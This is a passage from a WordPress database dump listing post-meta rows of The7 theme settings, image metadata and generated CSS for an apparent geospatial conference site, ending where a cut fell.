(10974,2709,'_dt_fancy_header_layout_heading',''),
(10975,2709,'_dt_fancy_header_title_aligment','center'),
(10976,2709,'_dt_fancy_header_height','300'),
(10977,2709,'_dt_fancy_header_padding-top','0px'),
(10978,2709,'_dt_fancy_header_padding-bottom','0px'),
(10979,2709,'_dt_fancy_header_breadcrumbs_heading',''),
(10980,2709,'_dt_fancy_header_breadcrumbs','disabled'),
(10981,2709,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(10982,2709,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(10983,2709,'_dt_fancy_header_title_heading',''),
(10984,2709,'_dt_fancy_header_title_mode','custom'),
(10985,2709,'_dt_fancy_header_title','Xuke Hu Institute of Data Science German Aerospace Center (DLR),  Germany (ICWG IV/III)'),
(10986,2709,'_dt_fancy_header_title_font_size','30'),
(10987,2709,'_dt_fancy_header_title_line_height','36'),
(10988,2709,'_dt_fancy_header_text_transform','none'),
(10989,2709,'_dt_fancy_header_title_color_mode','color'),
(10990,2709,'_dt_fancy_header_title_color','#ffffff'),
(10991,2709,'_dt_fancy_header_subtitle_heading',''),
(10992,2709,'_dt_fancy_header_subtitle',''),
(10993,2709,'_dt_fancy_header_subtitle_font_size','18'),
(10994,2709,'_dt_fancy_header_subtitle_line_height','26'),
(10995,2709,'_dt_fancy_header_subtitle_text_transform','none'),
(10996,2709,'_dt_fancy_header_subtitle_color_mode','color'),
(10997,2709,'_dt_fancy_header_subtitle_color','#ffffff'),
(10998,2709,'_dt_fancy_header_bg_heading',''),
(10999,2709,'_dt_fancy_header_bg_color','#222222'),
(11000,2709,'_dt_fancy_header_bg_image_origin','custom'),
(11001,2709,'_dt_fancy_header_bg_image','a:0:{}'),
(11002,2709,'_dt_fancy_header_bg_repeat','no-repeat'),
(11003,2709,'_dt_fancy_header_bg_position_x','center'),
(11004,2709,'_dt_fancy_header_bg_position_y','center'),
(11005,2709,'_dt_fancy_header_bg_fullscreen','1'),
(11006,2709,'_dt_fancy_header_bg_overlay','0'),
(11007,2709,'_dt_fancy_header_overlay_color','#000'),
(11008,2709,'_dt_fancy_header_bg_overlay_opacity','50'),
(11009,2709,'_dt_fancy_header_scroll_effect','default'),
(11010,2709,'_dt_fancy_header_bg_parallax','0.5'),
(11011,2709,'_dt_fancy_header_responsiveness_heading',''),
(11012,2709,'_dt_fancy_header_responsiveness','enabled'),
(11013,2709,'_dt_fancy_header_responsiveness_switch','778px'),
(11014,2709,'_dt_fancy_header_responsive_height','70'),
(11015,2709,'_dt_fancy_header_responsive_font_size','30'),
(11016,2709,'_dt_fancy_header_responsive_title_line_height','38'),
(11017,2709,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(11018,2709,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(11019,2709,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(11020,2709,'_dt_teammate_options_go_to_single','1'),
(11021,2709,'_dt_teammate_options_position',''),
(11022,2709,'_dt_teammate_options_website',''),
(11023,2709,'_dt_teammate_options_mail',''),
(11024,2709,'_dt_teammate_options_facebook',''),
(11025,2709,'_dt_teammate_options_twitter',''),
(11026,2709,'_dt_teammate_options_dribbble',''),
(11027,2709,'_dt_teammate_options_you-tube',''),
(11028,2709,'_dt_teammate_options_rss',''),
(11029,2709,'_dt_teammate_options_delicious',''),
(11030,2709,'_dt_teammate_options_flickr',''),
(11031,2709,'_dt_teammate_options_lastfm',''),
(11032,2709,'_dt_teammate_options_linkedin',''),
(11033,2709,'_dt_teammate_options_vimeo',''),
(11034,2709,'_dt_teammate_options_tumbler',''),
(11035,2709,'_dt_teammate_options_pinterest',''),
(11036,2709,'_dt_teammate_options_devian',''),
(11037,2709,'_dt_teammate_options_skype',''),
(11038,2709,'_dt_teammate_options_github',''),
(11039,2709,'_dt_teammate_options_instagram',''),
(11040,2709,'_dt_teammate_options_stumbleupon',''),
(11041,2709,'_dt_teammate_options_behance',''),
(11042,2709,'_dt_teammate_options_px-500',''),
(11043,2709,'_dt_teammate_options_tripedvisor',''),
(11044,2709,'_dt_teammate_options_vk',''),
(11045,2709,'_dt_teammate_options_foursquare',''),
(11046,2709,'_dt_teammate_options_xing',''),
(11047,2709,'_dt_teammate_options_weibo',''),
(11048,2709,'_dt_teammate_options_odnoklassniki',''),
(11049,2709,'_dt_teammate_options_research-gate',''),
(11050,2709,'_dt_teammate_options_yelp',''),
(11051,2709,'_dt_teammate_options_blogger',''),
(11052,2709,'_dt_teammate_options_soundcloud',''),
(11053,2709,'_dt_teammate_options_viber',''),
(11054,2709,'_dt_teammate_options_whatsapp',''),
(11055,2709,'_dt_teammate_options_reddit',''),
(11056,2709,'_dt_teammate_options_snapchat',''),
(11057,2709,'_dt_teammate_options_telegram',''),
(11058,2709,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(11059,2709,'rs_page_bg_color',''),
(11062,2712,'_edit_lock','1675605448:1'),
(11063,2712,'_edit_last','1'),
(11064,2712,'_wpb_vc_js_status','true'),
(11065,2712,'_dt_sidebar_position','disabled'),
(11066,2712,'_dt_sidebar_widgetarea_id','sidebar_1'),
(11067,2712,'_dt_sidebar_hide_on_mobile','0'),
(11068,2712,'_dt_footer_show','1'),
(11069,2712,'_dt_footer_widgetarea_id','sidebar_2'),
(11070,2712,'_dt_footer_hide_on_mobile','0'),
(11071,2712,'_dt_header_title','fancy'),
(11072,2712,'_dt_header_background','normal'),
(11073,2712,'_dt_header_background_below_slideshow','disabled'),
(11074,2712,'_dt_header_transparent_bg_color_scheme','light'),
(11075,2712,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(11076,2712,'_dt_header_transparent_top_bar_bg_opacity','25'),
(11077,2712,'_dt_header_transparent_bg_color','#000000'),
(11078,2712,'_dt_header_transparent_bg_opacity','50'),
(11079,2712,'_dt_header_disabled_background','normal'),
(11080,2712,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(11081,2712,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(11082,2712,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(11083,2712,'_dt_header_disabled_transparent_bg_color','#000000'),
(11084,2712,'_dt_header_disabled_transparent_bg_opacity','50'),
(11085,2712,'_dt_page_overrides_top_margin',''),
(11086,2712,'_dt_page_overrides_right_margin',''),
(11087,2712,'_dt_page_overrides_bottom_margin',''),
(11088,2712,'_dt_page_overrides_left_margin',''),
(11089,2712,'_dt_mobile_page_padding_top',''),
(11090,2712,'_dt_mobile_page_padding_right',''),
(11091,2712,'_dt_mobile_page_padding_bottom',''),
(11092,2712,'_dt_mobile_page_padding_left',''),
(11093,2712,'_dt_project_options_back_button',''),
(11094,2712,'_dt_project_options_show_link',''),
(11095,2712,'_dt_project_options_link',''),
(11096,2712,'_dt_project_options_link_target',''),
(11097,2712,'_dt_project_options_link_name',''),
(11098,2712,'_dt_project_options_hide_thumbnail','1'),
(11099,2712,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(11100,2712,'_dt_project_options_related_mode','same'),
(11101,2712,'_dt_project_options_preview','normal'),
(11102,2714,'_wp_attached_file','2022/10/ws10.jpg'),
(11103,2714,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1197;s:6:\"height\";i:474;s:4:\"file\";s:16:\"2022/10/ws10.jpg\";s:8:\"filesize\";i:161964;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"ws10-300x119.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:119;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9772;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"ws10-1024x405.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:405;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64489;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"ws10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6252;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:16:\"ws10-768x304.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:304;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41017;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11104,2712,'_wp_page_template','default'),
(11105,2712,'_dt_fancy_header_layout_heading',''),
(11106,2712,'_dt_fancy_header_title_aligment','center'),
(11107,2712,'_dt_fancy_header_height','300'),
(11108,2712,'_dt_fancy_header_padding-top','0px'),
(11109,2712,'_dt_fancy_header_padding-bottom','0px'),
(11110,2712,'_dt_fancy_header_breadcrumbs_heading',''),
(11111,2712,'_dt_fancy_header_breadcrumbs','disabled'),
(11112,2712,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(11113,2712,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(11114,2712,'_dt_fancy_header_title_heading',''),
(11115,2712,'_dt_fancy_header_title_mode','custom'),
(11116,2712,'_dt_fancy_header_title',''),
(11117,2712,'_dt_fancy_header_title_font_size','49'),
(11118,2712,'_dt_fancy_header_title_line_height','36'),
(11119,2712,'_dt_fancy_header_text_transform','none'),
(11120,2712,'_dt_fancy_header_title_color_mode','color'),
(11121,2712,'_dt_fancy_header_title_color','#ffffff'),
(11122,2712,'_dt_fancy_header_subtitle_heading',''),
(11123,2712,'_dt_fancy_header_subtitle',''),
(11124,2712,'_dt_fancy_header_subtitle_font_size','18'),
(11125,2712,'_dt_fancy_header_subtitle_line_height','26'),
(11126,2712,'_dt_fancy_header_subtitle_text_transform','none'),
(11127,2712,'_dt_fancy_header_subtitle_color_mode','color'),
(11128,2712,'_dt_fancy_header_subtitle_color','#ffffff'),
(11129,2712,'_dt_fancy_header_bg_heading',''),
(11130,2712,'_dt_fancy_header_bg_color','#222222'),
(11131,2712,'_dt_fancy_header_bg_image_origin','featured_image'),
(11132,2712,'_dt_fancy_header_bg_image','a:0:{}'),
(11133,2712,'_dt_fancy_header_bg_repeat','no-repeat'),
(11134,2712,'_dt_fancy_header_bg_position_x','center'),
(11135,2712,'_dt_fancy_header_bg_position_y','center'),
(11136,2712,'_dt_fancy_header_bg_fullscreen','1'),
(11137,2712,'_dt_fancy_header_bg_overlay','0'),
(11138,2712,'_dt_fancy_header_overlay_color','#000'),
(11139,2712,'_dt_fancy_header_bg_overlay_opacity','50'),
(11140,2712,'_dt_fancy_header_scroll_effect','default'),
(11141,2712,'_dt_fancy_header_bg_parallax','0.5'),
(11142,2712,'_dt_fancy_header_responsiveness_heading',''),
(11143,2712,'_dt_fancy_header_responsiveness','enabled'),
(11144,2712,'_dt_fancy_header_responsiveness_switch','778px'),
(11145,2712,'_dt_fancy_header_responsive_height','70'),
(11146,2712,'_dt_fancy_header_responsive_font_size','30'),
(11147,2712,'_dt_fancy_header_responsive_title_line_height','38'),
(11148,2712,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(11149,2712,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(11150,2712,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(11151,2712,'_dt_microsite_primary_menu',''),
(11152,2712,'_dt_microsite_split_left_menu',''),
(11153,2712,'_dt_microsite_split_right_menu',''),
(11154,2712,'_dt_microsite_mobile_menu',''),
(11155,2712,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/10/ws10.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 49px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(11156,2712,'_thumbnail_id','2714'),
(11157,2712,'the7_shortcodes_dynamic_css','a:2:{s:32:\"a36029334f51e15da96bc7759e74504c\";s:6508:\".dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c  .team-media {\n  padding: 0px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c  .team-media img {\n  border-radius: 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-a36029334f51e15da96bc7759e74504c.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n   